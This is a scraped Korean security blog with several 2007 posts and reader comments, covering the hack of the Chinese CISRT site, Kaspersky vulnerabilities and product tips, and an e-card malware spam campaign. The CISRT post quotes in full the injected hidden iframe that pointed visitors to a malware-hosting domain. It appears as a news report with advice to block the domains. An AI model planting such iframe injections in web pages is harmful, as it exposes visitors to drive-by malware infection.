각 나라별로는 정보 보안을 담당하는 기관들이 있으며, 이러한 기관 내에는 침해사고 대응팀, 보안 대응팀 등이 운영되고 있다.

우리나라에서는 다음과 같은 기관이 있다.

이 번에 수모를 당한 기관은 중국에서 운영하고 있는 CISRT(Chinese Internet Security Response Team)으로 영문 웹사이트가 해킹을 당한 것으로 알려졌다.

CISRT 영문 웹사이트에는 다음과 같이 사과문이 게재되어 있다.

ARP attack to CISRT.org

We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.  

The malicious codes are inserted into the top of some pages.
<iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>


This link is taken the use of the vulnerability of BaoFeng Storm MPS ActiveX. A file "sms.exe" will be downloaded from this domain, the size is 37,888 bytes, Kaspersky detects it as Trojan-Downloader.Win32.Baser.w.

This trojan-downloader can download 20 trojans from ganbibi.com.

We suggest everyone could block this two domains "nmmmn.com","ganbibi.com"

사연은 이렇다. CISRT 웹사이트 중 영문 웹사이트의 일부 탑페이지에서 iframe 악성코드가 삽입되는 공격을 당했다. 이 웹사이트를 방문한 사람은 37Kb 크기의 "sms.exe"라는 실행 파일을 다운로드하게 한다. 이 파일은 카스퍼스키 안티바이러스에서는 "Troyan-Downloader.Win32.Baser.w"로 진단한다.

중국에서 개발한 웹 브라우저 기반의 미디어 플레이어인 BaoFeng Storm의 버퍼오버플로 취약점으로 통해 공격이 이루어졌다. BaoFeng Storm은 ActiveX 컨트롤을 이용하여 제공되며, 이전에 이미 시만텍은 사용자가 입력한 값을 확인하는 부분이 제대로 동작하지 않아 여러 개의 버퍼오버플로 취약점이 존재한다고 밝혔다.

CISRT는 웹 사이트가 해킹된 것이 아니라 "ARP" 공격의 이루어진 것으로 믿고 있다. "ARP" 공격은 최신 공격 기법 중의 하나로 ARP poisoning 또는 ARP spoofing 공격이라고도 한다.

보안 벤더인 F-Secure의 패트릭 러날드(Patrik Runald)는 CISRT 웹사이트가 해킹 당한 것으로 보이며, ARP 공격이라고 한다면 꽤 복잡한 방법을 사용했을 것이라고 밝혔다.

출처: http://www.zdnetasia.com/news/security/0,39044215,62032982,00.htm

특히 국가에서 운영하는 보안 기관의 웹사이트는 일반인들이 아무런 의심없이 접속하는 사이트로 보안 상태가 가장 철저하게 유지되어야 하는데, 이러한 사고가 났다니 참 어이없는 일이 아닐 수 없다.

우리나라 특히, 교육기관같은 정부기관은 외국의 해킹 앞마당 노릇을 하고 있는 형편이다. 이러한 점들을 보완해야 IT 강국으로서의 면모가 서지 않을까?

Daum 블로거뉴스
블로거뉴스에서 이 포스트를 추천해주세요.

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    댓글을 달아 주세요

    1. Favicon of http://kr.iamvip.net BlogIcon Jack Park 2007.10.05 15:18  댓글주소  수정/삭제  댓글쓰기

      어느 나라든 해킹당하는 일이 너무 자주 일어나는것 같네요..

    2. Favicon of http://moonslab.com BlogIcon 문스랩닷컴 2007.10.05 15:45  댓글주소  수정/삭제  댓글쓰기

      그러게 말입니다.

      우리나라도 조심해야 할텐데 말이죠.

    3. Favicon of http://www.nightmemory.com BlogIcon 밤의추억 2007.10.06 00:28  댓글주소  수정/삭제  댓글쓰기

      요즘 중국발 해킹이 대량으로 늘어나는 추세인데 이번 일로 인해 또 중국 해커들의 무차별 해킹 전쟁이 일어나는 것이 아닐까 걱정이네요. 이 양반들 망신당하는거 죽기보다 싫어하고 복수는 대를 물려서까지 하는 근성을 가지신 양반들이라... 하여간 보안의 중요성은 새삼 강조해도 부족함이 없는 것 같습니다. 좋은 정보 감사합니다.

    전세계적으로 호평받고 있는 카스퍼스키 안티바이러스 제품에 보안 취약점이 발견되어 주의가 요망된다.

    이 취약점은 카스퍼스키 안티바이러스 6.x와 7.x 그리고 인터넷 시큐리티 6.x와 7.x 등 가장 핵심적인 제품에서 발생한다. 7.0.125 버전에서 맨 처음 발견되었으며 다른 버전에서도 동일하게 나타날 것이다.

    이 취약점을 통해 공격자는 로컬 컴퓨터에서 서비스 거부(Denial of Service) 공격을 수행할 수 있다.

    원인은 특정한 후킹 함수의 매개변수를 처리할 때 KLIF.SYS g함수내에서 오류가 발생하기 때문으로 "NtCreateSection(), NtUserSendInput(), LoadLibraryA() 함수를 호출할 때와 특별하게 조작된 매개변수를 가진 SSDT 엔트리에서 발생한다고 한다.

    해결방법은 아직 없으며, 11월달의 업데이트를 통해 처리될 것으로 알려 졌다.

    관련 정보
    카스퍼스키: http://www.kaspersky.com/technews?id=203038706
    루트킷닷컴: http://www.rootkit.com/newsread.php?newsid=778
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      댓글을 달아 주세요

      카스퍼스키 안티바이러스 모바일 6.0은 모바일 장비에서 동작하는 안티바이러스 제품인데, 심비안  스마트폰에서 삭제하는 방법은 다음과 같다.



      Application  메뉴 -> Uninstall
      사용자 삽입 이미지

      KAV Mobile을 선택하고, Uninstall  버튼을 클릭한다.
      사용자 삽입 이미지
      Uninstall software 대화상자에서 Yes를 클릭한다.
      사용자 삽입 이미지

      출처: http://support.kaspersky.com/faq/?qid=208279204
      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        댓글을 달아 주세요

        요즘 새로운 스팸들과 관련하여 다양한 보안 경고가 뉴스가 되곤 합니다.

        오늘 소개할 자료는 연하장(E-Greeting Card)를 가장하여 수신되는 스팸으로 인해 악성 프로그램에 감염되는 이메일 공격 중 하나입니다.

        우리나라의 경우에는 영어를 주로 사용하고 있지 않아 그리 큰 피해가 예상되지는 않습니다만, 영문화권에서는 이 이메일 공격이 효과를 발휘하고 있습니다.

        아래 그림과 같이 제목이 보통 "Movie-Quality ecard"라고 되어 있으며, 문안 인사를 고품질의 동영상으로 제공한다는 낚시성 제목입니다.
        사용자 삽입 이미지

        문제는 본문 속에 나타나 있는 링크 주소인데 이 링크 주소를 클릭하면 보통 새로운 창(또는 기존 창이 바뀌면서)에서 해당 주소로 이동하게 됩니다. 아래 화면처럼 클릭을 유도하는 링크가 나타납니다.
        사용자 삽입 이미지

        링크 주소는 URL이나 IP 주소로 되어 있는데, 이러한 IP 주소를 확인해 보면 미국이나 동유럽 쪽이 다수이고 일부의 경우에는 미국내의 ISP 주소도 포함되어 있다고 합니다. 미국내의 IP 주소는 이 악성프로그램에 감염된 PC라고 합니다.

        사용자 시스템에 하나 또는 그 이상의 파일을 설치하는데 이 파일들의 목적이 바로 사용자의 화면(및 데이터)를 캡춰합니다.
        사용자 삽입 이미지

        다운로드하는 파일은 msdataaccess.exe 파일로 F-Secure에서는 Email-Word.Win32.Zhelatin.gg라고 진단합니다.

        문제는 예전에 감염되던 전통적인 방식은 메일 메시지의 첨부 파일에 바이러스가 포함된 또는 바이러스 감염을 유도하는 실행파일을 전송하였기 때문에 안티스팸/바이러스 장비에서 이를 손쉽게 걸러냈습니다.

        하지만, 메일 본문에 그것도 링크로 되어 있는 경우에는 이러한 보안 장비로는 차단이 어렵기 때문에 사용자의 주의가 한번 더 요구됩니다.

        마지막으로 국내외 안티 바이러스의 검사 결과입니다. 안랩의 V3와 카스퍼스키의 무검출이 눈에 띄는 군요.
        사용자 삽입 이미지

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus

          댓글을 달아 주세요

          1. Favicon of http://eloiz.woobi.co.kr/tc BlogIcon 아이프리드 2007.08.16 19:59  댓글주소  수정/삭제  댓글쓰기

            이 포스팅을 보고 집에와서 메일 확인하는데 비슷한 내용의 메일을 받았습니다. 휴지통에 들어가있더군요.[NATE에서 스팸으로 처리] 내용은 "어머니에게 감사의 마음을 전하세요." 란 내용인듯 하며 링크된 IP주소도 다른곳이군요. 하여간 메일보고 생각나서 댓글 달아봅니다. ㅎㅎ

          2. MK 2007.08.17 01:30  댓글주소  수정/삭제  댓글쓰기

            그럼 이거 어떻게 치료해야되요?
            저 지금 이거 당했거든요 ㅠ
            외국인친구가 메일 보낸줄 알고 실행시켰는데
            당황스럽네요..
            치료는 쉽게되는건가요?

            • Favicon of https://websters.tistory.com BlogIcon 오바맨 2007.08.17 10:13 신고  댓글주소  수정/삭제

              안녕하세요?

              요즘 대부분의 안티바이러스에서 이 바이러스를 진단하고 있습니다.

              V3(2007.8.16일패턴), 카스퍼스키(2007.8.17일패턴)는 진단하지 못하는 군요.

              ㅎㅎ

          3. 키스6.0잡힙니다. 2007.08.18 21:01  댓글주소  수정/삭제  댓글쓰기

            아무래도 카스 버전낮은거로 해서 안잡히는듯 하군요.

          4. SDFGSDF 2007.08.30 23:38  댓글주소  수정/삭제  댓글쓰기

            카스퍼스키 4.0버전이라그러는듯
            6.0으론잡히던대

          카스퍼스키 안티 바이러스(Kaspersky Anti-Virus)는 전세계적으로 성능을 인정받는 제품 중의 하나입니다. 카스퍼스키 홈페이지에서는 자사 엔진을 액티브-엑스 컨트롤을 이용하여 사용할 수 있도록 온라인 검사 서비스를 제공합니다.


          컴퓨터를 왠만큼 사용하는 유저라면 자신이 선호하는 안티 바이러스 제품을 사용할 것입니다. 안티 바이러스는 제품의 특성상 동시에 2개 이상을 사용하는 경우에는 프로그램의 이상 또는 운영체제 자체에 심각한 문제가 발생할 수 있습니다.

          다행히도 액티브-엑스 컨트롤을 통해 제공되는 온라인 검사 서비스의 경우에는 윈도우 서비스로 동작하지 않기 때문에 이러한 문제가 발생하지 않습니다.

          온라인 검사 링크: http://www.kaspersky.co.kr/service_onlinescan.html

          주의: 컴퓨터에 카스퍼스키 제품이 설치되어 있는 경우에는 반드시 어느 하나를 포기해야 합니다. 다른 백신의 경우에는 무방합니다.

          액티브-엑스 컨트롤을 사용하기 때문에 마이크로소프트의 인터넷 익스플로러 이외의 다른 브라우저에서는 동작하지 않습니다. 홈페이지에 따르면 IE 5 이상에서 동작합니다.

          카스퍼스키 온라인 스캐너 아이콘을 클릭하면 액티브-엑스 컨트롤을 설치하는 화면이 나타납니다. 수락하면 아래와 같이 스캐너 엔진과 관련 데이터베이스를 다운로드합니다.
          사용자 삽입 이미지

          다운로드가 완료되면 가운데 하단에 다음 버튼을 눌러 본격적으로 바이러스를 검사할 수 있습니다.

          검사 옵션으로는 운영체제가 위치한 중요한 폴더만 검사할지, 컴퓨터 전체, 메일 데이터, 특정한 폴더나 파일을 선택하여 검사할 수 있습니다. 영역을 클릭하면 곧바로 검사가 진행됩니다.
          사용자 삽입 이미지

          아래와 같이 현재 검사하는 파일의 경로, 걸리는 시간, 얼마나 검사했는지를 보여준다.
          사용자 삽입 이미지

          이러한 온라인 검사 서비스를 통해 우리가 사용하는 컴퓨터를 좀더 안전하게 사용할 수 있도록 일주일에 한번 정도 정기적으로 검사하길 추천합니다.


          끝.
          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            댓글을 달아 주세요

            사용자 삽입 이미지
              V3로 유명한 안철수 연구소에서 지난 5월부터 본격적인 서비스를 제공하는 빛자루는 '인터넷 통합 보안 솔루션'이다.

            V3에서는 바이러스, 웜 등을 처리하고, 스파이제로에서는 스파이웨어, 악성코드 등을 진단하여 치료한다. 두 프로그램은 별개로 동작한다. 한편, 안철수 연구소가 개발한 인터넷 시큐리티 제품(V3 IS)에서는 바이러스, 웜, 악성코드, 방화벽 기능까지 복합적으로 제공한다. 한가지 재미있는 사실은 국내에서 악성코드로 분류할 수 밖에 없는 이상한(!) 프로그램을 사용자의 투표에 따라 그레이웨어로 간주할 수 있다는 점이다.

            또한, 빛자루는 이러한 서비스를 온라인화한 것으로 외국의 바이러스 벤더인 마이크로소프트의 라이브원케어, 시만텍의 노턴360과 겨룰 수 있는 제품이다.

            빛자루 서비스를 이용하려면 웹 페이지를 방문하여 먼저 사용자 계정을 만들어야 한다. 이 서비스는 일정기간 무료로 사용할 수 있는 쉐어웨어 형태를 가지고 있다. 하지만, 날짜가 지나더라도 서비스가 중지되지 않고 다만 일부 기능(업데이트를 직접해야 하는 불편함)의 제한만 있다. 사용자가 조금만 관심을 가지고 사용한다면 무료로 좋은 프로그램을 꾸준히 이용할 수 있다는 뜻이다.

            참! 정식으로 구매하는 경우에는 동시에 3대를 사용할 수 있다. 요즘 가정에서는 보통 1대 이상의 컴퓨터를 가지고 있는데 하나의 가격으로 모두 사용할 수 있다는 메리트가 있다.

            빛자루의 설치과정은 아주 평이하므로 별도로 설명하지 않고 빛자루의 기능에 대해 간단히 소개한다. 이 자료는 홈페이지에서 본 정보이다.

            • V3를 통한 바이러스/웜의 진단 및 치료
            • 레지스트리 등의 컴퓨터에 관련한 다양한 옵션 튜닝
            • 안티 피싱 기능
            • 개인용 방화벽 기능 제공
            • 아웃룩과 같은 메일 클라이언트에서 송수신하는 메일의 바이러스, 스팸 여부 진단 처리
            • 그레이웨어(Greyware) 진단 치료(사용자의 투표에 따라 결정)
            • 최신 엔진 업데이트(무료 사용자는 수동)

            빛자루를 사용해 보면, 일단 사용자 인터페이스가 아주 간편하고 친숙하다. 심지어 초등학생까지도 컴퓨터를 조그만 알고 있으면 충분히 다룰 수 있을 정도이다.

            하지만, 단점 하나, 둘 발견!

            실제 빛자루를 설치하고 삭제하는 과정을 반복해 보면, 한 방에 제대로 삭제가 되지 않는다. 즉, 통합 설치가 된다면 반대로 통합 삭제가 지원이 되어야 하는데 이부분이 약간 미진하다. 예를 들어, 카스퍼스키 인터넷 시큐리티 제품을 사용하다 삭제해 보면 어떤 것을 삭제할지, 사용자 데이터는 남겨 둘지 다양하게 설정이 가능하다. 이런 부분을 좀더 보완해야 할 거 같다.

            그리고, 설치 제거후 재설치를 하더라도 윈도우 보안 센터에서는 백신이 설치되어 있지 않다는 오류가 계속나타난다. 아래 그림에서 보면, 가장 왼쪽 아이콘이 바로 빛자루, 맨 오른쪽이 경고! 무언가 레지스트리에서 오류가 발생하는 거 같다.
            사용자 삽입 이미지

            이러한 부분만 좀더 보완한다면 꽤 괜찮은 보안 서비스가 될 수 있을 것으로 생각한다.

            끝.


            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus

              댓글을 달아 주세요

              1. Favicon of http://persiancat.tistory.com BlogIcon JooJoo 2007.08.09 00:22  댓글주소  수정/삭제  댓글쓰기

                트랙백 신청 해놓고 갑니다.
                편안한밤 되셔요 ^^

              AOL은 2006년에 카스퍼스키 안티 바이러스 엔진을 번들로 하는 무료 안티 바이러스 패키지인 액티브 바이러스 쉴드(Active Virus Shield)를 제공하기 시작했습니다. 아마 국내에도 많은 사람이 이 제품을 사용하는 것으로 알고 있습니다.

              하지만, 이제 이 소프트웨어의 배포를 중지하기로 결정했다는 소식입니다. 해당 웹 페이지를 방문해보면, 간단하게 중지된다는 내용을 보여 줍니다.

              그리고, 맥아피의 Virus Scan Plus 특별판을 제공한다고 합니다. 새로운 웹 페이지를 방문해 보세요.

              예전에 작성했던 관련 기사 링크: http://www.moonslab.com/402


              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus

                댓글을 달아 주세요

                CheckPoint Firewall-1에 공급되는 카스퍼스키 안티바이러스 제품에 서비스 거부 공격을 받을 수 있는 취약점이 발견되었다. 이 문제는 알려지지 않은 오류로 서비스를 중지시키는 즉 서비스 거부 공격을 일으킨다고 한다.

                영향받는 제품: 카스퍼스키 안티바이러스 5.5 Checkpoint Firewall-1용

                해결 방안: 긴급 보안 패치(v5.5.161.0) 적용

                참고 문서: http://www.frsirt.com/english/advisories/2007/2561

                감사합니다.

                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus

                  댓글을 달아 주세요

                  1. Favicon of http://shiningmiracle.tistory.com/ BlogIcon 미래축구 2007.07.19 08:50  댓글주소  수정/삭제  댓글쓰기

                    좋은 정보 감사합니다. ㅎ

                  중국에서 유명한 안티 바이러스 업체로 Rising Antivirus의 제작사인 Rising Tech 社는 경쟁 제품인 카스퍼스키가 자사의 프로그램을 바이러스로 오진하는 중대한 6개의 실수를 했다고 주장했다.

                  이러한 방해로 인해 두 회사 간에 분쟁이 발생해 왔으며 최근 5월달에 카스퍼스키 안티바이러스 제품의 업데이트 이후에 Rising Tech 소프트웨어를 잠재적인 악성 프로그램을 분류해 오면서 시작되었다고 합니다.

                  이러한 문제점은 카스퍼스키의 바이러스 자동 진단 또는 휴리스틱 진단에서 주로 발생하였으며 이러한 문제가 발생할 때마다 재빨리 문제를 해결했다고 합니다. 하지만, 사실적으로 이러한 문제로 인해 Rsing Tech 소프트웨어가 영향을 받는 것을 자명한 사실일 것입니다. 특히, 두 제품을 모두 설치하여 사용하는 사용자에게는 어느 한 제품에서 이러한 문제가 발생하는 경우에는 Rising Tech 제품이 업데이트를 진행하지 못하는 사태에 이르게 한다고 합니다.

                  특히, Rising Tech는 지난 6개월간 이러한 문제점이 모두 22건이나 발생하였으며 5월 30일 경 카스퍼스키 북경 지사를 고소할 계획이라고 밝혔습니다.

                  이러한 안티 바이러스 프로그램끼리의 오진은 과거에는 자주 있었지만 최근에는 그리 자주 나타나는 문제는 아닙니다.

                  참고: 중국 인터넷침해사고 대응센터의 자료

                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus

                    댓글을 달아 주세요

                    이 뉴스는 아직 공식적으로 확인된 부분이 아니므로, 카스퍼스키 바이러스 백신 사용자는 참조 목적으로 이해하시기 바랍니다.

                    카스퍼스키 안티바이러스에서 고급 기능으로 제공하는 기능 중에 iCheckeriShift가 있습니다. 이 중 iShift 기술은 특정한 파일에 NTFS 식별자를 이용하여 태그를 붙여 바이러스 검사 속도를 향상시키는 기술입니다. 물론, 파일이 변경되는 것을 추적하여 변경된 파일만 검사하게 합니다.
                    사용자 삽입 이미지
                    문제는 이 기술 때문에 CHKDSK 프로그램의 기능에 문제가 발생한다는 한 사용자의 지적이 있었습니다. 또한 카스퍼스키 안티바이러스를 삭제한 후에도 이 문제가 여전히 발생한다고 합니다. 카스퍼스키는 MS의 결함이라고 주장하였지만 이 사용자는 문제점이 카스퍼스키에 있다고 주장했습니다.

                    게시판에는 다양한 의견이 나오고 있으며, 어떤 사용자들은 이러한 오류가 나오지 않는다고 합니다.

                    하여튼, 중요한 점은 어느 누구 잘못이냐를 떠나서 일단 iSHift 기능을 사용하는 카스퍼스키 사용자는 CHKDSK 사용을 가급적 중지하는 것이 좋을 거 같습니다.

                    감사합니다.



                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus

                      댓글을 달아 주세요



                      Web Analytics Blogs Directory